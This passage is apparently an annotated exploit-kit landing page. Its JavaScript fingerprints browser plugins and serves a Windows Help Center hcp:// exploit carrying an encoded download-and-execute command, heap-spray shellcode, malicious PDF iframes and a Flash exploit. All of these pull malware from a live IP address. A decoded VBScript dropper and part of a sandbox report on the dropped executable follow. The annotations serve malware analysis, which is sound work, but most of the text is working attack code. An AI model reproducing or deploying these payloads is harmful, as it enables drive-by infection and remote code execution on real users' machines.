} catch(d) {}
return f
},
convertFuncs: function (g) {
var a, h, f, b = /^[\$][\$]/,
d = {},
c = this;
for(a in g) {
if(b.test(a)) {
d[a] = 1
}
}
for(a in d) {
try {
h = a.slice(2);
if(h.length > 0 && !g[h]) {
g[h] = g[a](g);
delete g[a]
}
} catch(f) {}
}
},
initScript: function () {
var c = this,
a = navigator,
e = "/",
i = a.userAgent || "",
g = a.vendor || "",
b = a.platform || "",
h = a.product || "";
if(c.file) {
c.file.$ = c
}
if(c.verify) {
c.verify.$ = c
};
c.OS = 100;
if(b) {
var f, d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
for(f = d.length - 2; f >= 0; f = f - 2) {
if(d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.isIE = new Function("return " + e + "*@cc_on!@*" + e + "false")();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
c.ActiveXEnabled = false;
if(c.isIE) {
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
for(f = 0; f < j.length; f++) {
if(c.getAXO(j[f])) {
c.ActiveXEnabled = true;
break
}
}
c.head = c.isDefined(document.getElementsByTagName) ? document.getElementsByTagName("head")[0] : null
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
c.isSafari = (/Safari\s*\/\s*\d/i).test(i) && (/Apple/i).test(g);
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
},
init: function (c) {
var b = this,
a, c;
if(!b.isString(c)) {
return -3
}
if(c.length == 1) {
b.getVersionDelimiter = c;
return -3
}
c = c.toLowerCase().replace(/\s/g, "");
a = b[c];
if(!a || !a.getVersion) {
return -3
}
b.plugin = a;
if(!b.isDefined(a.installed)) {
a.installed = a.version = a.version0 = a.getVersionDone = null;
a.$ = b;
a.pluginName = c
}
b.garbage = false;
if(b.isIE && !b.ActiveXEnabled) {
if(a !== b.java) {
return -2
}
}
return 1
},
fPush: function (b, a) {
var c = this;
if(c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
a.push(b)
}
},
callArray: function (b) {
var c = this,
a;
if(c.isArray(b)) {
for(a = 0; a < b.length; a++) {
if(b[a] === null) {
return
}
c.call(b[a]);
b[a] = null
}
}
},
call: function (c) {
var b = this,
a = b.isArray(c) ? c.length : -1;
if(a > 0 && b.isFunc(c[0])) {
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
} else {
if(b.isFunc(c)) {
c(b)
}
}
},
getVersionDelimiter: ", ",
$$getVersion: function (a) {
return function (g, d, c) {
var e = a.init(g),
f, b, h = {};
if(e < 0) {
return null
};
f = a.plugin;
if(f.getVersionDone != 1) {
f.getVersion(null, d, c);
if(f.getVersionDone === null) {
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
},
cleanup: function () {},
addWinEvent: function (d, c) {
var e = this,
a = window,
b;
if(e.isFunc(c)) {
if(a.addEventListener) {
a.addEventListener(d, c, false)
} else {
if(a.attachEvent) {
a.attachEvent("on" + d, c)
} else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
},
winHandler: function (d, c) {
return function () {
d();
if(typeof c == "function") {
c()
}
}
},
WLfuncs0: [],
WLfuncs: [],
runWLfuncs: function (a) {
var b = {};
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if(a.onDoneEmptyDiv) {
a.onDoneEmptyDiv()
}
},
winLoaded: false,
$$onWindowLoaded: function (a) {
return function (b) {
if(a.winLoaded) {
a.call(b)
} else {
a.fPush(b, a.WLfuncs)
}
}
},
div: null,
divID: "plugindetect",
divWidth: 50,
pluginSize: 1,
emptyDiv: function () {
var d = this,
b, h, c, a, f, g;
if(d.div && d.div.childNodes) {
for(b = d.div.childNodes.length - 1; b >= 0; b--) {
c = d.div.childNodes[b];
if(c && c.childNodes) {
for(h = c.childNodes.length - 1; h >= 0; h--) {
g = c.childNodes[h];
try {
c.removeChild(g)
} catch(f) {}
}
}
if(c) {
try {
d.div.removeChild(c)
} catch(f) {}
}
}
}
if(!d.div) {
a = document.getElementById(d.divID);
if(a) {
d.div = a
}
}
if(d.div && d.div.parentNode) {
try {
d.div.parentNode.removeChild(d.div)
} catch(f) {}
d.div = null
}
},
DONEfuncs: [],
onDoneEmptyDiv: function () {
var c = this,
a, b;
if(!c.winLoaded) {
return
}
if(c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
return
}
for(a in c) {
b = c[a];
if(b && b.funcs) {
if(b.OTF == 3) {
return
}
if(b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
return
}
}
}
for(a = 0; a < c.DONEfuncs.length; a++) {
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
},
getWidth: function (c) {
if(c) {
var a = c.scrollWidth || c.offsetWidth,
b = this;
if(b.isNum(a)) {
return a
}
}
return -1
},
getTagStatus: function (m, g, a, b) {
var c = this,
f, k = m.span,
l = c.getWidth(k),
h = a.span,
j = c.getWidth(h),
d = g.span,
i = c.getWidth(d);
if(!k || !h || !d || !c.getDOMobj(m)) {
return -2
}
if(j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
return 0
}
if(l >= i) {
return -1
}
try {
if(l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
if(!m.winLoaded && c.winLoaded) {
return 1
}
if(m.winLoaded && c.isNum(b)) {
if(!c.isNum(m.count)) {
m.count = b
}
if(b - m.count >= 10) {
return 1
}
}
}
} catch(f) {}
return 0
},
getDOMobj: function (g, a) {
var f, d = this,
c = g ? g.span : 0,
b = c && c.firstChild ? 1 : 0;
try {
if(b && a) {
c.firstChild.focus()
}
} catch(f) {}
return b ? c.firstChild : null
},
setStyle: function (b, g) {
var f = b.style,
a, d, c = this;
if(f && g) {
for(a = 0; a < g.length; a = a + 2) {
try {
f[g[a]] = g[a + 1]
} catch(d) {}
}
}
},
insertDivInBody: function (a, i) {
var h, f = this,
b = "pd33993399",
d = null,
j = i ? window.top.document : window.document,
c = "<",
g = (j.getElementsByTagName("body")[0] || j.body);
if(!g) {
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
} catch(h) {}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if(g) {
if(g.firstChild && f.isDefined(g.insertBefore)) {
g.insertBefore(a, g.firstChild)
} else {
g.appendChild(a)
}
if(d) {
g.removeChild(d)
}
} else {}
},
insertHTML: function (g, b, h, a, k) {
var l, m = document,
j = this,
p, o = m.createElement("span"),
n, i, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
if(!j.isDefined(a)) {
a = ""
}
if(j.isString(g) && (/[^\s]/).test(g)) {
p = f + g + ' width="' + j.pluginSize + '" height="' + j.pluginSize + '" ';
for(n = 0; n < b.length; n = n + 2) {
if(/[^\s]/.test(b[n + 1])) {
p += b[n] + '="' + b[n + 1] + '" '
}
}
p += ">";
for(n = 0; n < h.length; n = n + 2) {
if(/[^\s]/.test(h[n + 1])) {
p += f + 'param name="' + h[n] + '" value="' + h[n + 1] + '" />'
}
}
p += a + f + "/" + g + ">"
} else {
p = a
}
if(!j.div) {
i = m.getElementById(j.divID);
if(i) {
j.div = i
} else {
j.div = m.createElement("div");
j.div.id = j.divID;
j.insertDivInBody(j.div)
}
j.setStyle(j.div, c.concat(["width", j.divWidth + "px", "height", (j.pluginSize + 3) + "px", "fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
if(!i) {
j.setStyle(j.div, ["position", "absolute", "right", "0px", "top", "0px"])
}
}
if(j.div && j.div.parentNode) {
j.div.appendChild(o);
j.setStyle(o, c.concat(["fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
if(o && o.parentNode) {
o.focus()
}
} catch(l) {}
try {
o.innerHTML = p
} catch(l) {}
if(o.childNodes.length == 1 && !(j.isGecko && j.compareNums(j.verGecko, "1,5,0,0") < 0)) {
j.setStyle(o.firstChild, c.concat(["display", "inline"]))
}
return {
span: o,
winLoaded: j.winLoaded,
tagName: (j.isString(g) ? g : "")
}
}
return {
span: null,
winLoaded: j.winLoaded,
tagName: ""
}
},
flash: {
mimeType: "application/x-shockwave-flash",
progID: "ShockwaveFlash.ShockwaveFlash",
classID: "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",
getVersion: function () {
var b = function (i) {
if(!i) {
return null
}
var e = /[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(i);
return e ? e[0].replace(/[rRdD\.]/g, ",").replace(/\s/g, "") : null
};
var j = this, g = j.$, k, h, l = null, c = null, a = null, f, m, d;
if(!g.isIE) {
m = g.hasMimeType(j.mimeType);
if(m) {
f = g.getDOMobj(g.insertHTML("object", ["type", j.mimeType], [], "", j));
try {
l = g.getNum(f.GetVariable("$version"))
} catch(k) {}
}
if(!l) {
d = m ? m.enabledPlugin : null;
if(d && d.description) {
l = b(d.description)
}
if(l) {
l = g.getPluginFileVersion(d, l)
}
}
} else {
for(h = 15; h > 2; h--) {
c = g.getAXO(j.progID + "." + h);
if(c) {
a = h.toString();
break
}
}
if(!c) {
c = g.getAXO(j.progID)
}
if(a == "6") {
try {
c.AllowScriptAccess = "always"
} catch(k) {
return "6,0,21,0"
}
}
try {
l = b(c.GetVariable("$version"))
} catch(k) {}
if(!l && a) {
l = a
}
}
j.installed = l ? 1 : -1;
j.version = g.formatNum(l);
return true
}
},
adobereader: {
mimeType: "application/pdf",
navPluginObj: null,
progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
INSTALLED: {},
pluginHasMimeType: function (d, c, f) {
var b = this,
e = b.$,
a;
for(a in d) {
if(d[a] && d[a].type && d[a].type == c) {
return 1
}
}
if(e.getMimeEnabledPlugin(c, f)) {
return 1
}
return 0
},
getVersion: function (l, j) {
var g = this,
d = g.$,
i, f, m, n, b = null,
h = null,
k = g.mimeType,
a, c;
if(d.isString(j)) {
j = j.replace(/\s/g, "");
if(j) {
k = j
}
} else {
j = null
}
if(d.isDefined(g.INSTALLED[k])) {
g.installed = g.INSTALLED[k];
return
}
if(!d.isIE) {
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if(g.getVersionDone !== 0) {
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if(!j) {
n = b
}
if(!b && d.hasMimeType(g.mimeType)) {
b = d.findNavPlugin(a, 0)
}
if(b) {
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if(!h && d.OS == 1) {
if(g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
h = "9"
} else {
if(g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
h = "8"
}
}
}
}
} else {
h = g.version
}
if(!d.isDefined(n)) {
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
} else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c = /=\s*([\d\.]+)/g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
for(m = 0; m < 5; m++) {
if(c.test(f) && (!h || RegExp.$1 > h)) {
h = RegExp.$1
}
}
} catch(i) {}
g.installed = h ? 1 : (b ? 0 : -1)
}
if(!g.version) {
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
},
zz: 0
};
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver = PluginDetect.getVersion("AdobeReader");
flashver = PluginDetect.getVersion('Flash');
} catch(e) {}
if(typeof pdfver == 'string') {
pdfver = pdfver.split('.')
} else {
pdfver = [0, 0, 0, 0]
}
if(typeof flashver == 'string') {
flashver = flashver.split('.')
} else {
flashver = [0, 0, 0, 0]
};
exec7 = 1;
function spl0() {
spl2()
}
function spl2() {
spl3()
}
function show_pdf(src) {
var pifr = document.createElement('IFRAME');
pifr.setAttribute('width', 1);
pifr.setAttribute('height', 1);
pifr.setAttribute('src', src);
document.body.appendChild(pifr)
}
function spl3() {
if(pdfver[0] > 0 && pdfver[0] < 8) {
exec7 = 0;
show_pdf('./content/ap1.php?f=b6863')
} else if((pdfver[0] == 8) || (pdfver[0] == 9 && pdfver[1] <= 3)) {
exec7 = 0;
show_pdf('./content/ap2.php?f=b6863')
}
spl4()
}
function spl4() {
var m = document.createElement('IFRAME');
/* below comes out to be:
cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://50.116.17.63/stats/content/hcp_vbs.php?f=b6863&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe
*/
m.setAttribute('src', 'hcp :// services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<scr' + 'ipt defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,53,48,46,49,49,54,46,49,55,46,54,51,47,115,116,97,116,115,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,98,54,56,54,51,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</scr' + 'ipt > ');
/* The above checks at http://50.116.17.63/stats/content/hcp_vbs.php?f=b6863&d=0 to get instructions (below),
then goes to http://50.116.17.63/stats/w.php?e=5&f=b6863 and downexecs an exe
w=3000:
x=200:
y=1:
z=false:
a = "http://50.116.17.63/stats/w.php?e=5&f=b6863":
Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")): //Scripting.FileSystemObject
Set f=e.GetSpecialFolder(2):
b = f & "\exe.ex2":
b=Replace(b,Month("2010-02-16"),"e"):
OT = "GET":
Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")): //MSXML2.XMLHTTP
Set d = CreateObject(StrReverse("maertS.BDODA")) Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")) On Error resume next c.open OT, a, z:
//ADODB.Stream and Scripting.FileSystemObject , respectively
c.send() If c.Status = x Then d.Open:
d.Type = y:
d.Write c.ResponseBody:
d.SaveToFile b:
d.Close End If Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW")) Eval(Replace("W.ex2c b", Month("2010-02-16"), "E")) W.eXeC "taskkill /F /IM wm" & "player.exe":
//WScript.Shell
W.eXeC "taskkill /F /IM realplay.exe":
Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("bv.l") & "s"):
//l.vbs
g.Delete:
WScript.Sleep w:
Set g=o.GetFile(b):
Eval("g.Delete")
*/
m.setAttribute('width', 0);
m.setAttribute('height', 0);
document.body['appendChild'](m);
spl5()
}
function getCN() {
return 'content/score.swf'
}
function getBlockSize() {
return 1024
}
function getAllocSize() {
return 1024 * 1024
}
function getAllocCount() {
return 300
}
function getFillBytes() {
var a = '%u' + '0c0c';
return a + a;
}
function getShellCode() {
if(1) {
/* does something, then downloads and executes http://50.116.17.63/stats/w.php?f=b6863&e=4 */
return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u52e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u181d%u1906%u1e19%u1906%u061f%u1b1e%u5b07%u495c%u5b5c%u5f07%u5806%u5840%u4e17%u4a15%u101e%u1b1e%u4d0e%u1915%u2828";
}
}
function spl5() {
var ver1 = flashver[0];
var ver2 = flashver[1];
var ver3 = flashver[2];
if(((ver1 == 10 && ver2 == 0 && ver3 > 40) || ((ver1 == 10 && ver2 > 0) && (ver1 == 10 && ver2 < 2))) || ((ver1 == 10 && ver2 == 2 && ver3 < 159) || (ver1 == 10 && ver2 < 2))) {
var fname = "content/field";
var Flash_obj = "<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>";
Flash_obj += "<param name='movie' value='" + fname + ".swf' />";
al = "always";
Flash_obj += "<param name=\"allowScriptAccess\" value='" + al + "' />";
Flash_obj += "<param name='Play' value='0' />";
Flash_obj += "<embed src='" + fname + ".swf' id='swf_id' name='swf_id'";
Flash_obj += "allowScriptAccess='" + al + "'";
Flash_obj += "type='application/x-shockwave-flash'";
Flash_obj += "width='10' height='10'>";
Flash_obj += "</embed>";
Flash_obj += "</object>";
var oSpan = document.createElement("span");
document.body.appendChild(oSpan);
oSpan.innerHTML = Flash_obj;
}
setTimeout(end_redirect, 8000);
}
spl0();
/********************************* anubis report for exe below: ************************************/
[#############################################################################]
Analysis Report for bc9deebcb0ccc83e6fff18b5fc924470-b21fa87a3f1c481c5c30916b63034168-1330454785
MD5: 7650a8aa7d4f891982f0ca24a24e9c0c
[#############################################################################]
Summary:
- Write to foreign memory areas:
This executable tampers with the execution of another process.
- Packed Binary:
This executable is protected with a packer in order to prevent it
from being reverse engineered.
- Execution did not terminate correctly:
The executable crashed.
- Autostart capabilities:
This executable registers processes to be executed at system start.
This could result in unwanted actions to be performed automatically.
- Changes security settings of Internet Explorer:
This system alteration could seriously affect safety surfing the World
Wide Web.
- Performs File Modification and Destruction:
The executable modifies and destructs files which are not temporary.
- Spawns Processes:
The executable produces processes during the execution.
- Performs Registry Activities:
The executable creates and/or modifies registry entries.
[=============================================================================]
Table of Contents
[=============================================================================]
- General information
- bc9deebcb0.exe
a) Registry Activities
b) File Activities
c) Process Activities
- KB00983751.exe
a) Registry Activities
b) File Activities
c) Process Activities
- Explorer.EXE
a) Registry Activities
b) File Activities
c) Process Activities
d) Other Activities
- ctfmon.exe
a) Registry Activities
b) File Activities
- msmsgs.exe
a) Registry Activities
b) File Activities
- reader_sl.exe
a) Registry Activities
b) File Activities
- wscntfy.exe
a) Registry Activities
b) File Activities
- kxuckd.exe
a) File Activities
- drlwszvxbeo.exe
a) Registry Activities
b) File Activities
- cmd.exe
a) Registry Activities
b) File Activities
[#############################################################################]
1. General Information
[#############################################################################]
[=============================================================================]
Information about Anubis' invocation
[=============================================================================]
Time needed: 252 s
Report created: 02/28/12, 19:34:48 UTC
Termination reason: Timeout
Program version: 1.75.3394
[=============================================================================]
Global Network Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
DNS Queries:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Name: [ hmvmgywkvayilcwh.ru ], Query Type: [ DNS_TYPE_A ],
Query Result: [ ], Successful: [ 0 ], Protocol: [ udp ]
Name: [ xvmzegestulhtvqz.ru ], Query Type: [ DNS_TYPE_A ],
Query Result: [ ], Successful: [ 0 ], Protocol: [ udp ]
Name: [ hjpyvexsutdctjol.ru ], Query Type: [ DNS_TYPE_A ],
Query Result: [ 46.137.85.218 62.183.104.36 78.107.82.98 94.20.30.91 124.124.212.172 184.106.151.78 184.172.134.158 208.109.171.99 211.44.250.173 ], Successful: [ 1 ], Protocol: [ udp ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
HTTP Conversations:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
From ANUBIS:1028 to 46.137.85.218:8080 - [ hjpyvexsutdctjol.ru:8080 ]
Request: [ POST /rwx/B3_d02/in/ ], Response: [ 200 "OK" ]
[#############################################################################]
2. bc9deebcb0.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Primary Analysis Subject
Filename: bc9deebcb0.exe
MD5: 7650a8aa7d4f891982f0ca24a24e9c0c
SHA-1: b3a32d512c1e28a269e7947da4807cd39bbb6ef3
File Size: 73216 Bytes
Command Line: "C:\bc9deebcb0.exe"
Process-status
at analysis end: dead
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.DLL ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\MSVCRT.DLL ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\PSAPI.DLL ],
Base Address: [0x76BF0000 ], Size: [0x0000B000 ]
Module Name: [ C:\WINDOWS\system32\SECUR32.DLL ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\TAPI32.DLL ],
Base Address: [0x76EB0000 ], Size: [0x0002F000 ]
Module Name: [ C:\WINDOWS\system32\rtutils.dll ],
Base Address: [0x76E80000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
[=============================================================================]
Run-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x5D090000 ], Size: [0x0009A000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\Apphelp.dll ],
Base Address: [0x77B40000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.DLL ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
[=============================================================================]
SigBuster Output
[=============================================================================]
UPX All_Versions SN:1634
[=============================================================================]
2.a) bc9deebcb0.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ AppData ], New Value: [ C:\Documents and Settings\Administrator\Application Data ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ],
Value Name: [ KB00983751.exe ], New Value: [ "C:\Documents and Settings\Administrator\Application Data\KB00983751.exe" ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\CLASSES\HTTP ],
Value Name: [ Source Filter ], Value: [ {E436EBB6-524F-11CE-9F53-0020AF0BA770} ], 2 times
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ],
Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\Setup ],
